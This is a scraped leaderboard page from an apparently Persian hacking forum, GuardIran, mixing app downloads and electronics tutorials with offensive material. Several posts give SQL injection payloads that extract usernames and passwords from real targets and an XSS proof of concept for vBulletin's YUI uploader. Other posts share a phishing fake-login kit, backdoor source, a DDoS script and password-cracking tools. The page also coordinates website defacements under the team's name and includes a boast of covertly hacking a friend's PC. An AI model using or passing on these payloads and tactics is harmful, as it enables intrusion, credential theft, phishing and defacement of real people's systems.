رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

تخته امتیازات

  1. FLash_Syborg

    FLash_Syborg

    کاربر تازه‌وارد


    • امتیاز

      13

    • ارسال ها

      33


  2. RT3N

    RT3N

    مدیرکل


    • امتیاز

      12

    • ارسال ها

      538


  3. An0int3d

    An0int3d

    کاربر رسمی


    • امتیاز

      11

    • ارسال ها

      525


  4. alizombie

    alizombie

    جاویدان


    • امتیاز

      11

    • ارسال ها

      304


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در 09/21/2015 در همه بخش ها

  1. جایگزین شماره گیرندروید با قابلیت چرخش90 و180 درجه از قابلیت های دیگه این برنامه دفتر تلفن زیبا و جذاب است این برنامه علاوه بر طراحی منحصر به فرد از قدرت بالایی نیز برخوردار است.. پسور:guardiran.org RocketDial Pro 3.3.6.rar
    5 امتیاز
  2. 4 امتیاز
  3. اینم یک سایت اسرائیلی تقدیم به شما [Hidden Content]
    3 امتیاز
  4. با سلام خدمت شما دوستان گرامی مسلما" شما با طریقه ی به دست اوردن ip خودتان اشنایی دارید مثلا اگر در cmd کامپیوتر ipconfig را تایپ کنیم ایپی مورد نظر خودتان را به شما نشان میدهد اما از انجایی که برای شما public ip را نمایش نمیدهد ممکن است که مجبور شوید به سایت هایی مثل whatsmyip.com و یا مشابه به ان مراجعه کنید اما با نرم افزاری که در زیر این برایتان ضمیمه میکنم میتوانید با یک کلیک انرا پیدا کنید .در ادامه ی همین تایپیک نرم ازار های مربوطه به ip scanningوport scanning را ضمیمه میکنم که همگی تست شده اند و کاملا جوابگوی کار های شما هستند تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد نر افزار های بهتر و جدید تر با شما به اشتراک خواهم داد پسورد فایــل : guardiran.org با تشکر از شما دوستان گرامی ShowMyIP.rar
    2 امتیاز
  5. اپلود نشده فیک پیج ربطی به هاست رایگان و غیر رایگان نداره و اگه تو هاست پولیم آپ شه باعث مسدود شدن اکانت یا همون هاست میشه شما میتونین از راه های دیگه و بهتر برای حملات فیشینگ استفاده کنین
    2 امتیاز
  6. [Hidden Content] [Hidden Content] یک گاو :دی تقدیم به شما [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
    2 امتیاز
  7. [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] دیفسر نیستم آیا؟؟؟؟؟؟؟
    2 امتیاز
  8. [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] Archiv [Hidden Content] [Hidden Content]
    2 امتیاز
  9. بــا ســلام این هم یک DDOSER عالی برای شما با پسوند SH. هستش ک مثل DDOSER های دیگه عمل می کنه پسورد فایل : guardiran.org DDoS Protection Script For iptables.zip
    2 امتیاز
  10. [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
    2 امتیاز
  11. target: [Hidden Content],2,3,group_concat%28User_ID,0x3a,Username,0x3a,Password%29,5,6,7,8+from+userCake_Users-- دوستان دقت کنید که یوزر و پسورد توی تایتل سایت هستش!
    2 امتیاز
  12. An0int3d

    هک جیمیل

    سلام از فیک پیج و ... میتونی استفاده کنی. همه چی تو این دنیا فانیه و قابل دورزدن و هکه به جز مرگ!!! موفق باشی وست عزیز....
    2 امتیاز
  13. با سلام خدمت شما دوستان گرامی همانطور که به شما گفتم در این پست طریقه ی تست دیود با مولتی متر و روش های نام گزاری انها به شما خواهم گفت...... تشخیص آند و کاتد و سالم بودن دیود با استفاده از اهم متر آنالوگ : اگر اهم متر آنالوگ ( عقربه ای ) را به دو سر دیود وصل کرده و اهم آن را اندازه بگیرید سپس اتصال دیود را برعکس کرده ، مجدداً اهم آن را اندازه بگیرید در صورتی که در یک حالت اهم متر ، اهم کم و در حالت دیگر اهم زیاد را اندازه بگیرد دیود سالم است . واضح است که در حالت اهم کم ، دیود به وسیله باتری داخلی اهم متر در بایاس مستقیم قرار گرفته است و در حالتی که اهم متر ، اهم زیاد را نشان می دهد دیود در بایاس معکوس قرار گرفته است که اصطلاحاً گفته می شود دیود از یک طرف راه می دهد و از طرف دیگر راه نمی دهد . در شکل های زیر این دو حالت نمایش داده شده است . در شکل اول دیود در بایاس مستقیم و در شکل دوم دیود در بایاس معکوس می باشد .(بایاس همان طریقه ی قرار گیری دیود در مدار است که در پست های قبلی به ان اشاره کرده ام) در حالتی که اهم متر ، اهم کم را نشان می دهد مثبت واقعی اهم متر به آند و منفی واقعی اهم متر به کاتد دیود اتصال دارد . به ترتیب می توان آند و کاتد دیود را تعیین کرد . البته مقدار مقاومتی که اهم متر نشان می دهد به انتخاب کلید سلکتور اهم متر بستگی دارد . یک دیود در صورتی معیوب می باشد که قطع و یا اتصال کوتاه شده باشد . در صورتی که دیود قطع شده باشد ، در هر دو حالت اتصال اهم متر به دو سر آن ، اهم متر ، اهم بینهایت را نشان می دهد و در صورتی که دیود اتصال کوتاه شده باشد در هر دو حالت اتصال اهم متر به دو سر دیود ، اهم متر ، اهم صفر را نشان می دهد . تشخیص آند و کاتد وسالم بودن دیود با استفاده از مولتی متر دیجیتالی : اغلب مولتی مترهای دیجیتالی دارای وضعیت تست دیود هستند . هرگاه کلید سلکتور مولتی متر دیجیتالی را در وضعیت تست دیود که با علامت اختصاری دیود معمولی مشخص شده است قرار دهید و دیود به وسیله مولتی متر در بایاس موافق قرار بگیرد مولتی متر دیجیتالی ولتاژ بایاس دیود را نشان می دهد که این ولتاژ برای دیودهای سیلیسیومی بین 0.5 تا 0.7 ولت و برای دیودهای ژرمانیومی حدود 0.2 ولت می باشد . البته در بعضی از مولتی مترهای دیجیتالی در این حالت عبارت good نیز بر روی صفحه نمایش مولتی متر ظاهر می شود . اما اگر دیود در بایاس مخالف قرار گیرد ، ولتاژ بایاس مخالف اعمال شده به وسیله مولتی متر به دو سر دیود ، توسط مولتی متر نمایش داده خواهد شد و در بعضی از مولتی مترهای دیجیتالی در این حالت عبارت open بر روی صفحه نمایش مولتی متر نمایش داده می شود . در حالتی که مولتی متر ولتاژ بایاس موافق دیود را نشان می دهد ، سیم منفی ( com ) به کاتد و سیم مثبت به آند متصل است و به این ترتیب می توان آند و کاتد دیود را تعیین کرد . در صورتی که دیود قطع شده باشد در هر دو وضعیت اتصال مولتی متر به دیود ، روی صفحه نمایش آن ولتاژ باتری داخلی یا عبارت open نمایش داده می شود و اگر دیود اتصال کوتاه شده باشد در هر دو وضعیت اتصال مولتی متر به دیود ، روی صفحه نمایش مولتی متر ولتاژ صفر نمایش داده می شود . نامگذاری دیودها : برای نامگذار دیودها سه روش مهم وجود دارد . هر چند برخی از کارخانه های سازنده در گوشه و کنار دنیا از روش های مخصوصی برای نامگذاری استفاده می نمایند . این سه روش عبارتند از : 1- روش ژاپنی 2- روش اروپایی 3- روش آمریکایی روش ژاپنی : در این روش نامگذاری از عدد 1 و حرف S که به دنبال آن می آید استفاده می شود و به دنبال آن تعدادی شماره خواهد آمد که با مراجعه به جدول مشخصات دیودها می توان مشخصات الکتریکی آن را به دست آورد . در این روش ، جنس و نوع دیود مشخص نمی باشد . به عنوان مثال دیود 1S3010A دیود زنر ، دیود 1S310 یک دیود معمولی و دیود 1S2049 یک دیود واراکتور است . روش اروپایی : در روش اروپایی تا سال 1960 تمامی دیودها را با حروف OA و تعدادی شماره به دنبال آن مشخص می کردند که با مراجعه به جدول مشخصات دیودها می توانستیم مشخصات الکتریکی آن را به دست آوریم . مانند دیود OA34 . اما از سال 1960 به بعد این روش نامگذاری تغییر کرد . نحوه تغییر به این صورت بود که دیودهایی که بیشتر در مدارات رادیو و تلویزیون به کار می روند با دو حرف و سه شماره مشخص می شوند و دیودهایی که کاربرد آنها در مدارات مخصوصی می باشد با سه حرف و دو شماره معین می شوند . روش دو حرفی و سه شماره ای به این صورت است که حرف اول جنس نیمه هادی به کار رفته در دیود را مشخص می کند . اگر دیود از جنس ژرمانیوم باشد با حرف A و اگر از جنس سیلیسیوم باشد با حرف B مشخص می شود . حرف دوم نوع دیود را مشخص می کند که حرف A بیانگر دیود معمولی یکسوکننده ، حرف B بیانگر دیود واراکتور ، حرف Y بیانگر دیود یکسوکننده قدرت و حرف Z بیانگر دیود زنر است . بعد از این حروف شماره هایی آورده می شود که می توان با استفاده از آنها و با مراجعه به جدول مشخصات دیودها ، مشخصات الکتریکی دیود را به دست آورد . مثلاً دیود BA316 یک دیود یکسوکننده معمولی سیلیسیومی است و برای به دست آوردن مشخصات الکتریکی آن باید به جدول مشخصات دیودها مراجعه کرد . لازم به تذکر است که در اکثر مواقع در مورد نامگذاری دیود زنر ، ولتاژ زنر را نیز بر روی آن قید می کنند . روش آمریکایی : در این روش از عدد 1 و حرف N و تعدادی شماره که به دنبال آن می آید استفاده می شود . در این روش جنس و نوع دیود مشخص نمی باشد . با توجه به شماره ای که بعد از 1N می آید می توان با مراجعه به جدول مشخصات دیودها مشخصات الکتریکی و نوع دیود را تعیین کرد . مثلاً دیود 1N4007 یک دیود یکسو کننده است که مشخصات الکتریکی آن را می توان از جداول مربوطه به دست آورد . بعضی مواقع نیز به جای ارقام بعد از 1N از کدهای رنگی استفاده می شود . زمانی که از کدهای رنگی استفاده می شود از چاپ 1N صرفنظر می شود . کدهای رنگی مانند مقاومت ها می باشد با این تفاوت که شماره رنگ ها به دنبال هم قرار می گیرد . مثلاً دیود نمایش داده شده در شکل زیر ، دیود 1N4148 می باشد . خب باید به عرض شما دوستان برسانم که بعد از سه یا چهار پست اینده به شما طریقه ی ساخت مدار را اموزش میدهم که مدار هایی بسیار ساده و کاربردی است مثلا همین پاور بانک هایی که با قیمت بالایی به شما میفروشند..... و یا اسپیکر های موبایلی که به صورت زیادی در بازار دیده میشود و کیفیت های مختلفی نیز دارند مطمئن باشید که در ادامه ی این تاپیک ها شما میتوانید هر مداری که دیدید .....چه در اینترنت و چه در کتابی قدیمی را میتوانید به راحتی بسازید و حتی کسب در امد کنید!!!!! من خودم مثالی واضح را میزنم که انجام داده ام.....من یک نوع نقشه ی پاور بانک را در اینترنت دیدم و به ساخت ان پرداختم و بعد از این که یک نمونه با شکل و شمایل خوب درست کردم به دوستانم معرفی کردم و با استقبال زیادی در این مورد مواجه شدم......... به نظر من حال نوبت به شما رسیده است که با کمی خلاقیت دست به کار شوید و برای خودتان درامدی مناسب کسب کنید اگر سوالی داشتید و خوش حال میشوم که بتوانم به شما کمکی کنم پس در تاپیک سوال ها ..سوال خود را اعلام کنید تا به شما پاسخ دهم و تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد مطالب بهتر و جدید تر به شما اموزش خواهم داد پس لطفا تشکر یادتون نره
    2 امتیاز
  14. درود در این قسمت آموزش ساخت کار با Mojo Loger برای شما قرار میدم. لینک نرم افزار Mojo Loger در اینجا قرار دارد. پسورد فایل : guardiran.org mojo loger help.rar
    1 امتیاز
  15. با سلام در این تاپیک آموزش تصویری کار با ابزار Netcat که به NC هم معروفه به شما عزیزان آموزش میدم و از تمامیه دوستان خواهش می کنم اسپم ندن و اگر سوالی برای شما پیش آمد در این بخش مطرح بفرمایید . موفق باشین -
    1 امتیاز
  16. MrDarKNesS

    Winrar Password Remover

    اپلیکیشن کرک فایل های دارای رمز وین رار میتونین با این اپ به راحتی پسورد های وین رار رو کرک کنید !! ​ حجم این اپ 501 کیلوبایت !!!​ *بعد از اکسترکت کردن فایل نصبی باید محیط اپ و ... دانلود بشه* ​​​ رمز فایل : guardiran.org​ ​ Winrar Password Remover 1.4.0.rar
    1 امتیاز
  17. An0int3d

    دانلود منیجر ADM

    با سلام خدمت کاربران گرامی این نرم افزار بی شک و بی تردید بهترین و کامل ترین نرم افزار دانلود منیجر اندروید میباشد و بسیار عالی عمل میکند و البته این نسخه فول هستش و تیلیغات نداره و شما میتونید فایل هاتون رو خیلی سریع تر از قبل دانلود کنید و استفاده کنید و جالبه که بدونید این نرم افزار قابلیت تقسیم فایل ها به 9 پارت برای دانلود سریع تر را دارد. موفق و سربلند باشید ADM.zip
    1 امتیاز
  18. سلام و عرض ادب در هر یک از تیم های امنیتی بخش برنامه نویسی باید فعالترین و مهمترین بخش باشه بنده همینجا اعلام میکنم برای اینکه این بخش انجمن گاردایران پرنگ تر و بهتر بشه از هیچ کمکی دریغ نکنم و برای دوستانی که میخواهند تو این زمینه فعالیت کنند برای اهدا رنکینگ سخت گیری کمتری میکنیم در صورت تایید صلاحیت بلافاصیه رنکینگ به فعالان در این زمینه اهدا میشود انشالله با کمک دوستان این بخش رو پرنگ تر از قبل ببینیم
    1 امتیاز
  19. [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] با توجه به قوانینی که خوندم فک کنم الان رسما دیفیسر هستم.مگه نه؟؟؟؟
    1 امتیاز
  20. با سلام خدمت شما دوست گرامی اگر سوالی داشتید ممنون میشوم که به صورت خصوصی انرا ارسال کنید و یا انرا در قسمت سوال و پرسش ها بپرسیدو بدانید که در صورت تکرار............. و در جواب به سوالتون هم باید گفت بله!!!! مثلا اگر که شما در سریال هوش سیاه دقت میکردید میفهمیدید که در قسمت کلاهبرداری وی از بانک او یک قطعه ی الکترونیکی به نام رله را در کیس مدیر بانک جایگزاری کرد که در شب توانست سیستم را بدون دسترسی به کیس روشن وهک کندومبلغ هنگفتی را به دست اورد.....................(حرومش ) خب درسته که این فیلم بود ولی بهتر است بدانید که این روش امتحان شده است و جواب میدهد من تونستم همین کار رو با pc دوستم بکنم و او نیز بویی از این کار نبرد چون من قبل از این که چیزی بفهمد رله را بردم (این رو هم بگویم که رله را درون یک مودم جا داده بودم ) خب اگر که به این اموزش های ساده ی درون همین تاپیک ها توجه کنی میتوانی در حد نسبتا" خوبی راه بیوفتی و در این راستا قدم برداری در مورد برنامه نویسی هم باید گفت که میتونی در همین تیم امنیتی به اموزش ها توجه کنی و یاد گیری خودتون رو با برنامه ی visual basic شروع کنی هر سوالی هم داشتی اصلا خجالت نکش و بپرس چون ادم با همین سوال های جور واجوره که شروع به یاد گیری میکنه با تشکر از شما دوست گرامی
    1 امتیاز
  21. دفیستون رو در سایت های ثبت دیفیس به ثبت برسونید. با توجه به قوانین با نام guardiran Security Team باید به ثبت برسه. موفق باشید
    1 امتیاز
  22. [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
    1 امتیاز
  23. GAZALE201

    Ringtone Maker

    این برنامه برای کوتاه کردن اهنگ و قرار دادن به عنوان زنگ گوشی هست- با این برنامه میتونید موزیک دلخواه خود را ایجاد کنید وبه نام خودتون ثبت کنید پسورد:guardiran.org Ringtone Maker Pro 1.47.rar
    1 امتیاز
  24. GAZALE201

    خداحافظ

    با ارزوی سلامتی و موفقیت برای همه شما خدانگهدار برای همیشه!
    1 امتیاز
  25. abarestan

    تارگت های Sql Injection

    با سلام دوست عزیز دربخش مربوطه سوال خود را مطرح کنید . با یک سرچ مشکل شما حل میشه: [Hidden Content] باتشکر
    1 امتیاز
  26. سلام من هم میتونم تو بخش های زیر کمک تون کنم بخش برنامه نویسی/موبایل و ترجمه امیدوارم لحضات خوبی رو داشته باشیم
    1 امتیاز
  27. Ali1377

    اموزش الکترونیک

    اگه بخواهید کابل USB صفحه کلید یا موسی را که مشکل دار شده ، تعویض نمایید ، حتما به مشخصات سیم های USB ، نیاز خواهیم داشت. البته مشکل اینجاست که در کالاهای چینی استاندارد ، رنگ سیم ها رعایت نمیشه و اگه چند مدل صفحه کلید را باز کنید به این موضوع پی خواهیم برد که در تصویر زیر تمام رنگهایی را که جهت کابل USB استفاده شده ، مشخص نموده است : در تصویر زیر ، مطالب بالا بهتر قابل درک است :
    1 امتیاز
  28. Ali1377

    اموزش الکترونیک

    سلام می خواهیم از پاور کامپیوتر به عنوان منبع تغذیه استفاده کنیم.اما چجوری؟با ما همراه باشید... اول باید بریم سراغ رنگ سیم ها و ولتاژهاشون: سیم زرد:ولتاژ این سیم+12ولت است. سیم قرمز:ولتاژ این سیم +5 ولت است. سیم نارنجی:ولتاژ این سیم +3.3ولت است. سیم مشکی:این سیم ولتاژ نداره وفقط به عنوان منفی استفاده میشه. خوب تا الان سیم هایی رو که لازم داشتیم مشخص کردیم حالا میریم سراغ روشن کردن پاور... هرپاور کامپیوتر یک کابل بزرگ داره که سیم های زیادی از پاور به یک فیش که اسمشATXهست وصل میشن. برای روشن کردن پاور تنها به دوتا سیم نیاز داریم سیم سبز و یکی از سیم های مشکی که توی کابل بزرگ هست. یادتون باشه تمام سیم های مشکی توی پاور به هم وصل هستن پس فر قی ندارن کلا سیم های هم رنگ به هم وصل هستن... پاور رو به برق متصل کنید کلید پشت اون رو روی1قرار بدید وسیم سبز ومشکی رو به هم وصل کنید پاور روشن میشه و راحت می تونید ازش استفاده کنید. امید وارم مفید بوده باشه سوالی هم داشتید همین جا درخدمتم​
    1 امتیاز
  29. با سلام خدمت شما دوستان گرامی در اول از شما دوستان عذر خواهی میکنم که چند وقتی است که به انجمن نمیتوانم سر بزنم چون دیگر دانشگاه ها شروع شده و زمان کاری به من اجازه نمیدهد که درست به سوالات شما دوستان رسیدگی کنم......... اول از همه چون دیدم بحث داغی است و دیدم اختلاف نظر در این مورد زیاد است میخواهم که به شما دوستان بگویم که ما ویروس برای سوزاندن قطعات سخت افزاری هم داریم که کار کند....... البته باید گفت که به قول دوست عزیزم Angel0fD3ath باید که این نوع مطالب به دست دوستان قابل اعتماد سپرده شود و این گونه مطالب به بیرون از انجمن درز نکند خب میخواستم که این ویروس هارو در انجمن ضمیمه کنم ولی دیدم که اگر این مطالب به راحتی برای کاربران معمولی اینترنت هم نمایش داده شود اونوقت است که باید به دنبال روش جدیدی برای اجرای این کار باشم............... پس اول در همین تاپیک از مدیر میخواهم که راهی برای این مشکل پیدا کند..... در جواب بعضی از دوستان که میگویند این کار شدنی نیست نیز باید به شما بگویم که درست میگویید این کار با دستکاری ویندوز شدنی نیست و باید که برای انجام این کار به قسمت های اصلی سیستم نگاه کرد .......... چون من میخواهم بعد از رسیدگی مدیر به این مشکل یک پست کاملا توضیح دهم که این ویروس چکونه کار میکند فقط برای شما یک مثال ساده میزنم اگر شما به فن روی سی پی یو دقت کرده باشید میفهمید که با توجه به تغییر دمای ان سرعت گردش خود را زیاد میکند حال اگر که ما فن را در گردش کمتر از حد مورد نیاز قرار دهیم(انرا صفر نمیکنیم چون در گردش صفر دمای سی پی یو بسیار بالا رفته و به طور خودکار سیستم خاموش میشود) طی مدتی زمان که بستگی به نوع سی پی یو دارد و...... کلی متغییر دیگر به سی پی یو فشار وارد شده و صدمه میبیند و یا استفاده ی بیش از توان سی پی یو برای سیستم نیز میتوان ذکر کرد بله شما درست حدس زده اید!!!!!! ما با استفاده از overclock کردن سیستم قربانی به سخت افزار ان سیستم صدمه میزنیم اگر که مدیر گرامی توانستند راه حلی برای به اشتراک گذاشتن این مطالب به افراد مورد اعتماد پیدا کنند که من در خدمتتون هستم و گر نه اگر صلاح دید مدیر در این بود که این گونه مطالب در انجمن ضمیمه نشود............................ من نیز پیروی حرف مدیر میشوم و به سراغ همان ریتم معمول اموزش ها میرویم با تشکر از شما دوستان گرامی
    1 امتیاز
  30. با سلام خدمت دوست عزیز و خیلی ممنون از زحمتی که کشیدید . صفحه دیفیس رو می توانید از اینجا دانلود کنید: [Hidden Content] و اما اینکه شما اصلا به نام تیم امنیتی گارد ایران ثبت نکردید بلکه به نام saber.z ثبت کردید و پس این هک شما اصلا ربطی به تیم امنیتی گارد ایران نداره حالا شما یکم دست پاچه عمل کردید و متاسفانه انگار شما فقط یک اسپم دادید ... هیچ عجله ای برای ثبت دیفیس نیست . شما که دارید زحمت می کشید لطف کنید از این به بعد با دیفیس گارد ایران و با نام Guardiran Security Team ثبت کنید. یا علی
    1 امتیاز
  31. [Hidden Content],group_concat%28login,0x3a,pwd%29,3,4,5+from+corpsport_web.login
    1 امتیاز
  32. basic back door با سلام خدمت شما دوستان گرامی در این تاپیک میخواهم سورس یک ویروس بک ددور را برای اموزش و کاز با ان قرار بدهم چون در حد بیسیک است به راحتی میتوانید انرا تغییر داده و انرا بهتر کنید......البته این سورس برای اشنایی شما با طریقه ی کار کرد این ویروس ها است و سورس بک دور پیشرفته هم تو راه هست حال ممکن است بعضی از شما دوستان گرامی بپرسید که بک دور چیست؟؟؟پاسخ به این سوالتون این است که بک دور یا درب پشتی (Backdoor) روشی است که با آن بتوان اعتبار سازی جعلی کرد و گرفتن مجوز دسترسی جعلی، به قسمت های مشخصی از یک رایانه مثل سیستم عامل یا دیوار آتش (فایروال) نفوذ کرد. در واقع بک دور ها روشی (یا برنامه هایی) هستند برای گرفتن دسترسی (غیر مجاز) و ورود غیر مجاز به یک سامانه؛ بک دور ها با دور زدن سیستم امنیتی یک رایانه راه نفوذ به آن را باز می کنند. بک دور ها ممکن است در یک سیستم از قبل وجود داشته باشند و در این مواقع وظیفه هکر فقط پیدا کردن این بک دور ها برای استفاده است.ر گذشته بیشتر بک دور ها بر روس سیستم مانند یک باگ وجود داشت و هکر فقط آنها را پیدا می کرد و از طریق آن ها به سیستم وارد می شد. اما امروزه بیشتر بک دور ها نوشته می شوند و هکر ها با آپلود کردن این بک دور ها به سیستم، به آن نفوذ می کنند. بیشتر تروجان ها، از روش های بک دور برای نفوذ و گرفتن دسترسی به سیستم استفاده می کنند. خب حالا که با فواید این ویروس عزیز اشنا شدیم ........ بریم به سراغ طریقه ی ساختن ان..... این ویروس به زبان #c است و سورس انرا میتواننید البته با ملاحظات.... تغییر دهید. سورس ویروس رو هم برای راحتیه کارتون اون رو توی نود پد ضمیمه میکنم.... پسورد فایــل : guardiran.org اگر سوالی داشتید و خوش حال میشوم که بتوانم به شما کمکی کنم پس در تاپیک سوال ها ..سوال خود را اعلام کنید تا به شما پاسخ دهم و تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد ویروس هایی قوی تر و مخربتر به شما یاد خواهم داد با تشکر basic back door.rar
    1 امتیاز
  33. درود خدمت تمامی اعضای محترم گارد ایران صفحه دیفیس جدید تیم طراحی شده و دوستان و اعضای دیفیسر سایت از این صفحه برای دیفس سایت ها استفاده کنند. از تاریخ 94/12/20 فقط و فقط از همین صفحه دیفیس استفاده کنند. موفق باشید. guardiran.zip
    1 امتیاز
  34. با سلام خدمت کاربران گرامی این نرم افزار بهترین نرم افزار شبیه ساز اندروید میباشد که بسیار رنکینگ بالایی در گوگل پلی دارد و همچنین این نرم افزار اصلی هستش و شما با ورود به اون نرم افزار هایی شبیه تاچ پینت که در ایفون قرار دارد / نوار ابزار پایین ایفون / نوار ابزار اعلامات در بالایه ایفون صفحه تماس ها در ایفون / صفحه مسیج در ایفون و .... را میتوانید جدا گانه و کامل دانلود بنمایید و یه چیز دیگه این هستش که داخل نرم افزار شبیه بودن دستگاهتان را به ایفون نشان میدهد و اگه به 100% برسه یعنی هیچی از ایفون کم ندارید و کاملا دستگاهتون به ios تغییر کرده و برای نصب این نرم افزار به شما توصیه میکنم که روی گوشی هایی با پردازنده های قوی و سرعت بالا نصب نمایید زیرا میدونید تمامی لانچر همشون سرعت گوشی رو کم میکنند . موفق و سربلد باشید IL.zip
    1 امتیاز
  35. An0int3d

    appbackup and restore

    با سلام خدمت کاربران گرامی این نرم افزار قابلیت در اوردن سورس اصلی برنامه های نصب شده روی سیستم شما میباشد برای مثال نرم افزاری که نصب کردید فایل اصلی انرا پاک نموده اید و حالا به ان نیاز دارید و به وسیله این نرم افزار میتونید سورس را بیرون بکشید و حتی بین دستگاه های دیگر شیر کنید و انتقال دهید و در نسخه جدید این برنامه ویروس یابی هم طراحی شده که به کمک شما می اید. موفق باشید AppBR.zip
    1 امتیاز
  36. با سلام خدمت کاربران گرامی برای شما جدیدترین نسخه گوگل پلی که نرم افزاری برای دسترسی به فروشگاه بازی ها و نرم افزار های اندروید میباشد رو و گوگل پلی سرویس که پیش نیاز اون میباشد رو قرار میدهم توجه داشته باشید گوگل پلی سرویس پیش نیاز رو هر سیستمی جداگانه و با مشخصات خاص باید نصب کرد و هر گوگل پلی سرویسی نصب نمیشود و برای گرفتم dpi دستگاه خود باید نرم افزار cpuz را نصب کنید. موفق و سربلند باشید GooglePlaystore.zip
    1 امتیاز
  37. vBulletin YUI 2.9.0 Cross Site Scripting [+] Author: TUNISIAN CYBER [+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability [+] Date: 09-01-2014 [+] Category: WebApp [+] Google Dork: :inurl:"clientscript/yui/uploader/assets/" [+] Tested on: KaliLinux [+} Friend's blog: www.na3il.com ######################################################################################## +Description: YUI is a free, open source JavaScript and CSS library for building richly interactive web applications. Used by vBulletin. +Exploit: YUI suffers from an xss vulnerability. +P.O.C: 127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain="})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf Demo: [Hidden Content]})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf [Hidden Content]})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf [Hidden Content]})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf [Hidden Content]})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf Patch: Upgarde to 3.X Version. ./3nD
    1 امتیاز
  38. اسکنر Hydra و یا بهتره بگیم ابزار کرک پسورد Hydra رو برای شما دوستان در این فایل ارسال کردم تا ازش استفاده کنید . آموزش Hydra و اجرای Hydra در ویندوز رو در اینجا می تونید دانلود کنید و ازش استفاده کنید . رمز: guardiran.org Hydra.part1.rar Hydra.part2.rar Hydra.part3.rar
    1 امتیاز
  39. متاسفانه هیچ فایلی قابلیت دانلود رو نداره
    1 امتیاز
  40. با آموزش آرمیتیج در خدمتتون هستم البته آموزش تصویری آرمیتیج گاهی اواقت دیدم بعضی از دوستان نمی دونند که اصلا فلام ماژول به چه دردی میخوره و باید کلی سرچ کنند و یا اینکه فلان اکسپلویت به چه دردی میخوره و باید کل گوگل رو زیر و رو کنند بر این اساس تصمیم گرفتم در این آموزش تصویری بشما عزیزان یاد بدم که چطور در مورد : ابزار ( Auxiliary Metasploit ) ماژول ( Module Metasploit ) اسکنر ( Metasploit Scanner ) و..... بتونید اطلاعاتی کامل از خودش بیرون بکشید و براحتی متوجه بشین که به چه دردی میخوره لبته راهش آسونه اما دیدم شاید دوستان مبتدی بلد نباشند تضمیم گرفتم با توضیحات کامل ضبط کنم . فیلم حدود 7 دقیقه و با توضیحات کامل هست و تک ت گزینه هارو توضیح دادم و کیفیت فیلم هم عالیه مشکلی نداره . پسورد فایل : guardiran.org Armitage & Modules & Exploiting.part1.rar Armitage & Modules & Exploiting.part2.rar
    1 امتیاز
  41. سلام بر همه دوستان خوبم همونطور که می دونید صحات فیک پیج Fake Page بسیار مهم هست برای : هک ایمیل هک جی میل هک فیسبوک و... بسیاری از دوستان طریقه درست کردن فیک پیج Fakke page رو بلد نیستند و تصمیم گرفتم در این آموزش درست کردن yahoo fake login رو بطور کامل به شما آموزش بدم . یعنی یاد میگیرید که چطور یک یاهو مسنجر جعلی بسازید پسورد:guardiran.org موفق باشید fake login.zip
    1 امتیاز
  42. دوستان جای این مطلب واقعا خالی بود یادم رفته بود توضیحش بدم قبل از شروع آموزش های کرک حتما باید با این موضوع آشنا باشید با این سوال توضیحات رو شروع میکم... salt چیست؟؟؟! درست است وقتی بسورد ها رو هش میکنیم امنیت بالاتر میره اما برای اینکه باز هم امنیت بسورد بالاتر بره از salt استفاده میکنیم.. salt باعث میشود بیچیدگی در الگوریتم بیشتر شود که اگر بیچیدگی بیشتر شود رمزگشایی و کرک آن نیز سخت تر میشود در دنیای سایبری هیچوقت امنیت ۱۰۰ در ۱۰۰ تامین نمیشود بس نمیشه گفت رمزگشایی و کرک هش به همراه salt غیر ممکن میشود فقط کار برای نفوذگر و کرکر ها سخت تر از سخت میشود... خب به مثال زیر دقت کنید بسورد بدونه salt : guardiran md5 = dde309fb16a30f51b2ae4085f7ee0e49 خب حالا بسورد به همراه salt رو مشاهده کنید.. Hashed string: guardiran Salt: sesf055w3d5sew85 MD5 hash: 9d32ccd4b9c3e5961071a282a48e2e1f خب همانطور که مشاهده میکنید MD5 بدونه salt , با md5 دارای salt کاملا متفاوت از همدیگر هستند... salt به شکل ها مختلفی ایجاد میشود مثلا در cms جوملا به صورت زیر است password: 12345 e7d4aa4793a91a61bb1f1768095b765c:IEJh02NvSn0C2QmUmg0AuAEZSkgtk6Gv
    1 امتیاز
